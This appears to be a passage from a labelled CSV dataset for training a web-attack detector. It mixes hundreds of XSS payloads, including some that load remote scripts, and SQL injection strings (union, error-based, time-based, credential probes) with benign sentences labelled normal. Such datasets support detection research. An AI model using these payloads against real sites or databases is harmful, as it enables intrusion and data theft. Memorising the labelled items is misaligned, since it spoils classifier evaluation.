Eggs, Rainbow Select Hard-cooked Eggs in Vinegar, Nic's Salad Hard-boiled Eggs, Almark Hard-cooked Eggs and Sutherland Select Hard-cooked Eggs, according to the Food and Drug Administration.",3,normal,25438 Select the best wedding favor.,3,normal,24415 <figure onfocusout=alert(1) tabindex=1 id=x></figure><input autofocus>,1,XSS,2549 1'+ ( select tzvm where 5145 = 5145 and 4192 = 7437#,2,SQLi,18181 1' and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and 'pnpx' = 'pnpx,2,SQLi,13031 "javascript:'/*`/*'/*""/*\""/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script>",1,XSS,274 "UNION ALL SELECT 1,2,3,4,5#",2,SQLi,20856 "<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;",1,XSS,3620 "-2460%"" ) or ( 2660 = 5767 ) *5767 and ( ""%"" = """,2,SQLi,18789 Delete the old photos from your camera.,3,normal,22982 "<strong onmousemove=""alert(1)"">test</strong>",1,XSS,7011 "ORDER BY 1,SLEEP(5)",2,SQLi,21921 "<b onmousemove=""alert(1)"">test</b>",1,XSS,9272 "Select and display the waveform at the circuit input, the first, second and third inverter output wires and the final circuit output.",3,normal,25650 "<div id=d><x xmlns='""><iframe onload=alert(2)//'></div>",1,XSS,4635 "1"" ) ) as qhnb where 8302 = 8302 and ( 3020 = 3020 ) *6703--",2,SQLi,17154 <video onpointerover=alert(1)>XSS</video>,1,XSS,7710 -8023' in boolean mode ) order by 1#,2,SQLi,19977 "<SCRIPT/SRC=""%(jscript)s""></SCRIPT>",1,XSS,8985 "admin"" or 1=1/*",2,SQLi,22146 "select * from users where id = 1 | |1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,14336 1%' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( '%' = ',2,SQLi,10786 "1"" and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 )",2,SQLi,13969 "1'|| ( select 'lzvb' where 1637 = 1637 union all select null,null,null,null,null,null,null,null#",2,SQLi,14366 <blockquote onpointerout=alert(1)>XSS</blockquote>,1,XSS,5601 "<i onmouseover=""alert(1)"">test</i>",1,XSS,9293 "1 ) as lejp where 5238 = 5238 union all select null,null,null,null,null#",2,SQLi,16013 "-2424 ) where 8132 = 8132 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10379 "<track draggable=""true"" ondragstart=""alert(1)"">test</track>",1,XSS,3639 "1"" ) as piwi where 2918 = 2918",2,SQLi,20623 Delete bookmarks.,3,normal,23055 "1"" or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,18320 "<style>:target {transform: rotate(180deg);}</style><footer id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></footer>",1,XSS,601 1 where 3502 = 3502 order by 1--,2,SQLi,20300 "<style>@keyframes x{}</style><bdi style=""animation-name:x"" onanimationstart=""alert(1)""></bdi>",1,XSS,1654 admin' or 1=1,2,SQLi,22216 "<;IMG SRC="";javascript:alert(';XSS';)"";",1,XSS,8109 "<;EMBED SRC="";http://ha.ckers.org/xss.swf""; AllowScriptAccess="";always"";>;<;/EMBED>;",1,XSS,1895 <IMG ���><SCRIPT>alert(�XSS�)</SCRIPT>�>,1,XSS,7836 "{""id"":null,""name"":""thee""}",3,normal,26774 Update your email signature with flair.,3,normal,22957 1 ) as iiku where 9466 = 9466,2,SQLi,20773 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></kbd>",1,XSS,264 "<style>@keyframes slidein {}</style><meter style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></meter>",1,XSS,377 "1 where 9072 = 9072 and elt ( 4249 = 4249,7259 ) --",2,SQLi,18374 -8378%' ) union all select 5491#,2,SQLi,20365 "<style>@keyframes x{}</style><noembed style=""animation-name:x"" onanimationend=""alert(1)""></noembed>",1,XSS,1468 "1' where 4185 = 4185 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,12639 "1%' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and '%' = '",2,SQLi,13567 "select * from users where id = 1 <@&@ union select 1,version ( ) -- 1",2,SQLi,16250 >-->*/</noscript></ti tle><script>alert()</script>,1,XSS,5698 "1 ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17651 Save up to 25% on select grills and pool supplies,3,normal,25728 Select depart.,3,normal,24642 Select the book.,3,normal,22864 "<style>:target {color:red;}</style><content id=x style=""transition:color 1s"" ontransitionend=alert(1)></content>",1,XSS,943 Modify layout.,3,normal,22806 <BODY ONLOAD=alert('XSS')>,1,XSS,9666 "1%"" ) ) or sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,19754 select current_setting('krb_server_keyfile');,2,SQLi,19065 "1 ) as lhie where 4631 = 4631 union all select null,null,null,null,null--",2,SQLi,15906 "1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) # fmxq",2,SQLi,13377 "1"" ) ) as paep where 8947 = 8947 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10929 "1"" where 4082 = 4082 and elt ( 5699 = 1432,1432 ) --",2,SQLi,18210 Riders in select cities will be invited to participate via email.,3,normal,25750 Select salad.,3,normal,24499 "<object onmouseleave=""alert(1)"">test</object>",1,XSS,6581 "1%"" ) ) ) union all select null,null,null--",2,SQLi,19207 1 ) as ilqx where 8547 = 8547,2,SQLi,20717 Where's the cottage?,3,normal,23562 Check values where required.,3,normal,23358 "{""id"":null,""name"":""Skarmory""}",3,normal,26991 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></a>",1,XSS,300 Save up to 25% off select Grills and Pool Supplies,3,normal,25729 x' AND members.email IS NULL; --,2,SQLi,20231 1' ) ) ) and ( 8982 = 8027 ) *8027 and ( ( ( 'qkrv' = 'qkrv,2,SQLi,17265 "<object onclick=""alert(1)"">test</object>",1,XSS,7980 "1' ) ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ( 'wnzv' = 'wnzv",2,SQLi,11487 "<;A HREF="";javascript:document.location=';http://www.google.com/';"";>;XSS<;/A>;",1,XSS,2037 1 ) ) as syot where 1199 = 1199,2,SQLi,20448 1' where 6913 = 6913 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10474 "-1050"" ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ""orfo"" like ""orfo",2,SQLi,10188 "1, ( case when 8260 = 8260 then 1 else null end )",2,SQLi,18566 1' ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 'hgtg' = 'hgtg,2,SQLi,10315 select * from users where id = '1' *$ 1 or 1 = 1 -- 1',2,SQLi,17907 "1' ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13421 1'+ ( select 'gprq' where 8928 = 8928,2,SQLi,19920 "{""id"":null,""firstName"":""Debbie"",""lastName"":""Erqie"",""address"":""6649 N Blue Gum St"",""city"":""576"",""telephone"":""5827784694""}",3,normal,27514 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--",2,SQLi,14244 "<br onmousemove=""alert(1)"">test</br>",1,XSS,8847 <dfn id=x tabindex=1 onfocus=alert(1)></dfn>,1,XSS,6831 <script onpointerover=alert(1)>XSS</script>,1,XSS,7133 Where's the pub?,3,normal,23548 <abbr onpointerleave=alert(1)>XSS</abbr>,1,XSS,7957 1 ) ) as xroy where 3274 = 3274,2,SQLi,20494 ) AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337,2,SQLi,16650 Select win.,3,normal,24673 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--",2,SQLi,14014 "<script SRC=""http://www.securitycompass.com/xss.jpg""></script>",1,XSS,3146 select * from users where id = 1 + \+%\ or 1 = 1 -- 1,2,SQLi,18052 "select * from users where id = 1 union select 1a,banner from v$version where rownum = 1 -- 1",2,SQLi,14571 <iframe onpointerout=alert(1)>XSS</iframe>,1,XSS,7374 Select the ideal time.,3,normal,24294 "<noframes oncontextmenu=""alert(1)"">test</noframes>",1,XSS,5596 1 where 6518 = 6518,2,SQLi,22014 select ( case when ( 3537 = 5218 ) then 3537 else 3537* ( select 3537 from mysql.db ) end ) #,2,SQLi,14490 Where did you find that inspiring artwork?,3,normal,23780 Create a stunning sculpture.,3,normal,22723 "0\""autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>""-confirm(3)-""",1,XSS,2078 "<slot draggable=""true"" ondragleave=""alert(1)"">test</slot>",1,XSS,4105 <em id=x tabindex=1 onfocus=alert(1)></em>,1,XSS,7496 "<em onkeyup=""alert(1)"" contenteditable>test</em>",1,XSS,5970 "1' ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( 'nond' = 'nond",2,SQLi,15494 "1"" ) ) as yosd where 1255 = 1255",2,SQLi,20374 Join the cause.,3,normal,22847 "{""id"":null,""name"":""coffee""}",3,normal,27336 "1"" ) as ivkw where 4218 = 4218 union all select null--",2,SQLi,17989 <script src=//brutelogic.com.br&sol;1.js&num;,1,XSS,6757 "<figcaption draggable=""true"" ondragstart=""alert(1)"">test</figcaption>",1,XSS,2577 "1'+ ( select 'qvif' where 1758 = 1758 union all select null,null,null,null,null,null,null,null#",2,SQLi,14413 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ""azzv"" like ""azzv",2,SQLi,16308 <noscript id=x tabindex=1 onactivate=alert(1)></noscript>,1,XSS,4044 "-5300' union all select 2750,2750,2750,2750,2750,2750--",2,SQLi,17775 "1' in boolean mode ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12877 "<address oncopy=""alert(1)"" contenteditable>test</address>",1,XSS,4080 "select * from generate_series ( 3427,3427,case when ( 3427 = 7516 ) then 1 else 0 end ) limit 1--",2,SQLi,14270 <track onpointerover=alert(1)>XSS</track>,1,XSS,7757 "1"" ) where 5828 = 5828 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14190 <svg><xss onload=alert(1)></xss>,1,XSS,9465 ( select ( case when ( 6783 = 6783 ) then 1 else 1/ ( select 0 ) end ) ),2,SQLi,15984 "1 ) ) union all select null,null,null,null#",2,SQLi,19186 <form id=x tabindex=1 onbeforeactivate=alert(1)></form>,1,XSS,4605 "select * from generate_series ( 5846,5846,case when ( 5846 = 5227 ) then 1 else 0 end ) limit 1--",2,SQLi,14276 <noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus>,1,XSS,1987 "select sleep ( 5 ) and ( ""%"" = """,2,SQLi,20269 "<code onmouseenter=""alert(1)"">test</code>",1,XSS,7777 <body onwheel=alert(1)>,1,XSS,9729 "-7869%' union all select 2406,2406,2406,2406,2406,2406,2406,2406#",2,SQLi,16733 1'|| ( select 'mlwj' from dual where 4247 = 4247 and 1702 = 8469 ) ||',2,SQLi,16180 "select * from users where id = 1 or @$# = 1 union select 1,version ( ) -- 1",2,SQLi,15584 1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'yxpi' = 'yxpi,2,SQLi,10554 "1"" ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( ""yopd"" like ""yopd",2,SQLi,12196 I'm considering where to go for relaxation.,3,normal,23776 "<head draggable=""true"" ondragenter=""alert(1)"">test</head>",1,XSS,4056 SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/,2,SQLi,18645 Typical usage would be to allow a user to select a particular font.,3,normal,25234 "<abbr onkeyup=""alert(1)"" contenteditable>test</abbr>",1,XSS,5231 "1' ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( 'iqvg' = 'iqvg",2,SQLi,12394 end and ( ( 'zlsq' = 'zlsq,2,SQLi,20985 "1"" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,13690 "<data oncontextmenu=""alert(1)"">test</data>",1,XSS,7457 "<div draggable=""true"" contenteditable>drag me</div><body ondrop=alert(1) contenteditable>drop here</body>",1,XSS,1270 feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/>,1,XSS,866 Select cover.,3,normal,24696 <center id=x tabindex=1 onactivate=alert(1)></center>,1,XSS,4944 <area id=x tabindex=1 onbeforedeactivate=alert(1)></area><input autofocus>,1,XSS,2255 ") or (1""=""1""--",2,SQLi,22188 "1'+ ( select sxco where 1623 = 1623 union all select null,null--",2,SQLi,16779 Select a movie.,3,normal,24809 "-3082"" ) where 1082 = 1082 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10372 "<strike onclick=""alert(1)"">test</strike>",1,XSS,7943 "<style>:target {transform: rotate(180deg);}</style><audio id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></audio>",1,XSS,611 /><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />,1,XSS,4653 "You can mass select messages by clicking the first then using a Shift+Click on the last, or by using the Select all tick box in the top left-hand corner.",3,normal,25096 "-2784' ) ) union all select 6775,6775,6775,6775,6775,6775,6775,6775,6775#",2,SQLi,15910 "<s onkeydown=""alert(1)"" contenteditable>test</s>",1,XSS,5921 Let's decide where to go for a weekend getaway.,3,normal,23813 "1"" ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,14046 "1' where 2373 = 2373 union all select null,null#",2,SQLi,18772 <a id=x tabindex=1 onactivate=alert(1)></a>,1,XSS,7151 "1"" ) ) as oxrr where 6141 = 6141 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13672 "1 ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( 4127 = 4127",2,SQLi,10659 "In choosing his collaborators his principle was never to select nobles or ecclesiastics, but persons of inferior birth.",3,normal,26016 "waitfor delay '0:0:5' and ""%"" = """,2,SQLi,20197 Where clause in SQL query.,3,normal,23458 "<html oncut=""alert(1)"" contenteditable>test</html>",1,XSS,5583 Select move.,3,normal,24640 `'><script>\xE2\x80\xA8javascript:alert(512)</script>,1,XSS,5062 "As you select books to place into the basket, consider adding a few that baby will grow into and enjoy as a toddler.",3,normal,26349 <frameset onload=alert(123)>,1,XSS,9618 "{""id"":null,""firstName"":""Suan Choo"",""lastName"":""Lee"",""address"":""10-12 SCOTTS ROAD, #02"",""city"":""750"",""telephone"":""4198683783""}",3,normal,27363 <cite onpointerleave=alert(1)>XSS</cite>,1,XSS,8047 -3059' ) as jhbh where 4056 = 4056 or ( 3498 = 6965 ) *6965--,2,SQLi,17070 <rtc onpointerleave=alert(1)>XSS</rtc>,1,XSS,8389 "1 where 6095 = 6095 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14653 Where's the missing sock drawer?,3,normal,22618 <script src=%(jscript)s></script>,1,XSS,9314 <hgroup onblur=alert(1) tabindex=1 id=x></hgroup><input autofocus>,1,XSS,2778 "UNION ALL SELECT 1,2,3,4,5",2,SQLi,20949 "1 ) ) as llnm where 6510 = 6510 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13691 Plant some fresh flowers.,3,normal,22567 1%' ) ) order by 1#,2,SQLi,21969 "{""id"":null,""name"":""cotton""}",3,normal,27550 "<small onmouseleave=""alert(1)"">test</small>",1,XSS,7192 "1 ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13755 "1"" ) as esks where 1138 = 1138",2,SQLi,20541 "<var onkeyup=""alert(1)"" contenteditable>test</var>",1,XSS,5575 "<isindex x=""javascript:"" onmouseover=""alert()"">",1,XSS,6137 end and ( ( ( 'xzbk' = 'xzbk,2,SQLi,20839 1 ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( 5281 = 5281,2,SQLi,10577 "<aside oncut=""alert(1)"" contenteditable>test</aside>",1,XSS,5249 admin' ) or ( '1' = '1'#,2,SQLi,21184 "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",1,XSS,3983 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( granted_role ) FROM ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER ) WHERE LIMIT = 8 ) ) AND 'i' = 'i",2,SQLi,11109 ") AND ELT(1337=1337,SLEEP(5)) AND (1337=1337",2,SQLi,19077 AND 7300=7300 AND ('pKlZ'='pKlY,2,SQLi,20386 1'|| ( select 'feyg' from dual where 7734 = 7734 and 3843 = 6724#,2,SQLi,16687 "1%"" and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ""%"" = """,2,SQLi,13182 "<;META HTTP-EQUIV="";refresh""; CONTENT="";0;url=javascript:alert(';XSS';);"";>;",1,XSS,2174 "The embryo is provided with ten hooks, and appears to select Lamellibranchs (Mactra) for its intermediate host.",3,normal,25462 <col onpointerover=alert(1)>XSS</col>,1,XSS,8721 <br id=x tabindex=1 onfocus=alert(1)></br>,1,XSS,7455 "select * from users where id = 1 or 1#"". union select null,version ( ) -- 1",2,SQLi,15577 "<font onpaste=""alert(1)"" contenteditable>test</font>",1,XSS,5199 "1' union all select null,null,null,null,null,null,null#",2,SQLi,17817 "1'|| ( select 'uusj' where 2149 = 2149 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) ||'",2,SQLi,13234 "1%' ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11695 Select your preference.,3,normal,24890 "1 where 1186 = 1186 union all select null,null,null,null,null,null,null#",2,SQLi,16019 Democrats will select their nominee for speaker the week after Thanksgiving.,3,normal,26249 -4828%' ) or 8678 = 5745#,2,SQLi,21087 1' ) as tsge where 6970 = 6970,2,SQLi,20565 Select a medium or dark eyeliner color for lining your eyes.,3,normal,25663 -9739' or 8571 = 8571--,2,SQLi,21298 "<IMG SRC=x onkeyup=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3811 AnD SLEEP(5),2,SQLi,22328 "-5165' ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'zpnv' like 'zpnv",2,SQLi,10103 "1 ) ) as vzgo where 6281 = 6281 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12512 "-9558"" where 7497 = 7497 or ( 2539 = 6484 ) *6484--",2,SQLi,18289 "iif ( 7011 = 2522,1,1/0 )",2,SQLi,21097 "<s onbeforecut=""alert(1)"" contenteditable>test</s>",1,XSS,5545 "select * from users where id = 1 + @<@# union select null,version ( ) -- 1",2,SQLi,15705 "1"" ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ""rvuz"" like ""rvuz",2,SQLi,11888 "-7887' ) union all select 9049,9049,9049,9049,9049,9049,9049,9049,9049,9049#",2,SQLi,15543 "1"" ) where 5298 = 5298 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --",2,SQLi,10425 -8812 or 6872 = 6872# dflr,2,SQLi,20977 I'm thinking of where to go for relaxation.,3,normal,23710 1' ) ) ) order by 1#,2,SQLi,21754 if ( 9690 = 6491 ) select 9690 else drop function nyln--,2,SQLi,17677 "1%"" ) ) ) union all select null,null,null,null--",2,SQLi,18758 <button onFinish=javascript:alert(1)>,1,XSS,8748 "<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>",1,XSS,1386 "-4025"" or 3038 = 3038",2,SQLi,21689 "<s onmouseleave=""alert(1)"">test</s>",1,XSS,9039 "1', ( select ( case when ( 7711 = 7711 ) then 1 else 7711* ( select 7711 from information_schema.character_sets ) end ) )",2,SQLi,13119 "<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">",1,XSS,299 <sup onpointerover=alert(1)>XSS</sup>,1,XSS,8638 Save up to $400 off select MacBook Pro and iMac,3,normal,25732 "{""id"":null,""firstName"":""Wei Hong"",""lastName"":""Quek"",""address"":""11839 Federalist Way, Fairfax VA 22030"",""city"":""732"",""telephone"":""1538033370""}",3,normal,27416 "<strike onkeydown=""alert(1)"" contenteditable>test</strike>",1,XSS,3869 1 ) and 5196 = 9002,2,SQLi,21975 "g'""></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250",1,XSS,2079 "call regexp_substring ( repeat ( right ( char ( 2385 ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,15053 "select * from users where id = 1 or 1#""? union select 'a',version ( ) -- 1",2,SQLi,15699 "1' where 7190 = 7190 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14233 "{""id"":null,""firstName"":""Adsee"",""lastName"":""Wei"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27184 "1%' ) union all select null,null,null,null,null--",2,SQLi,18637 "select * from users where id = '1' or @ @1 = 1 union select 1,version ( ) -- 1'",2,SQLi,15240 "union (select NULL, (select @@version)) --",2,SQLi,19250 <hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus>,1,XSS,2539 1'|| ( select 'bwqc' from dual where 6897 = 6897 and sleep ( 5 ) #,2,SQLi,16602 "1' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( 'pded' = 'pded",2,SQLi,16419 "<tbody onmousedown=""alert(1)"">test</tbody>",1,XSS,7365 "<output onmouseenter=""alert(1)"">test</output>",1,XSS,6639 <thead onpointerenter=alert(1)>XSS</thead>,1,XSS,7501 "1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 )",2,SQLi,13506 "<rb onmouseout=""alert(1)"">test</rb>",1,XSS,9012 "I, meanwhile, have been able to select and shed habitats.",3,normal,26068 1 ) ) as eigk where 2557 = 2557,2,SQLi,20451 &lt;IMG SRC=&quot;livescript:[code]&quot;&gt;,1,XSS,6556 -2402 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) -- szgq,2,SQLi,10794 "1' or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,16155 "<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>",1,XSS,4656 "<style>@keyframes slidein {}</style><menuitem style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></menuitem>",1,XSS,322 "<embed onmouseenter=""alert(1)"">test</embed>",1,XSS,7138 "-1755%' union all select 2615,2615,2615,2615,2615,2615#",2,SQLi,17779 "1'+ ( select pepf where 5071 = 5071 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12008 "<a href=""javascript:alert(1)"" onmouseover=alert(1)>INJECTX HOVER</a>",1,XSS,2656 "1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,12166 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#",2,SQLi,13745 "1%"" ) rlike sleep ( 5 ) and ( ""%"" = """,2,SQLi,19806 "<div draggable=""true"" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable>drop here</colgroup>",1,XSS,888 "<xmp onkeypress=""alert(1)"" contenteditable>test</xmp>",1,XSS,5004 Sort cards.,3,normal,23057 "Whether you want to be creative and fit a circular picture or have an odd sized shaped photo, framers will work with you to get you what you want and will help you select the right style and color of wood frames.",3,normal,25139 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23",2,SQLi,17334 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></body>",1,XSS,246 1'+ ( select 'iify' where 6257 = 6257 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) ) +',2,SQLi,14782 <blink onpointerup=alert(1)>XSS</blink>,1,XSS,8210 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",2,SQLi,16551 "<content oncontextmenu=""alert(1)"">test</content>",1,XSS,5985 <sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus>,1,XSS,2365 "1"" ) ) ) and make_set ( 6751 = 8128,8128 ) and ( ( ( ""uhiy"" = ""uhiy",2,SQLi,16537 "<div draggable=""true"" contenteditable>drag me</div><video 